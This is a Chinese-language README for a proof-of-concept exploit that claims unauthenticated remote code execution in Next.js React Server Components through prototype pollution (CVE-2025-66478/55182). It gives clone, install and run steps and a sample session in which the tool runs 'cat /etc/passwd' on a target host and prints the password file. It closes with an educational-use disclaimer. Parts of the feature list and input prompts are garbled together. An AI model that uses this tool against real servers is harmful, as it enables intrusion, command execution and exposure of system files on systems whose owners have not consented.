Next.js 通过服务器组件中的原型污染实现远程代码执行 (RCE)
本仓库包含 CVE-2025-66478(某些上下文中也引用为 CVE-2025-55182)的概念验证 (PoC),这是一个影响使用特定版本 React Server Components (RSC) 的 Next.js 应用的关键漏洞。
通过操纵 RSC 的序列化过程,未经身份验证的攻击者可以利用 原型污染(__proto__:then)注入恶意有效载荷。这可能导致通过 child_process.execSync 在服务器上执行任意系统命令。
开发者: ArkhamKnight47
multipart/form-data 有效载荷。1:E{"digest":...})。\n 与 \r\n),确保在 Windows 和 Linux 目标上输出干净。requests 库# 克隆仓库
git clone https://github.com/RavinduRathnayaka/CVE-2025-55182-PoC.git
cd CVE-2025-55182-PoC
# 安装依赖
pip install requests
python CVE-2025-66478.py
系统将提示你输入:
http://localhost:3000id、whoami、cat /etc/passwd[?] 目标 URL > http://192.168.1.5:3000
[?] 命令 > cat /etc/passwd
[*] 正在执行漏洞利用...
[+] 有效载荷成功。输出如下:
============================================================
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
nextjs:x:1001:65533::/home/nextjs:/sbin/nologin
============================================================
本工具仅用于教育和安全研究目的。
作者(ArkhamKnight47)对滥用此代码不承担任何责任。针对您不拥有或未经明确许可的系统测试此漏洞利用是非法且不道德的。
负责任地使用。合乎道德地学习。保护您的技术栈。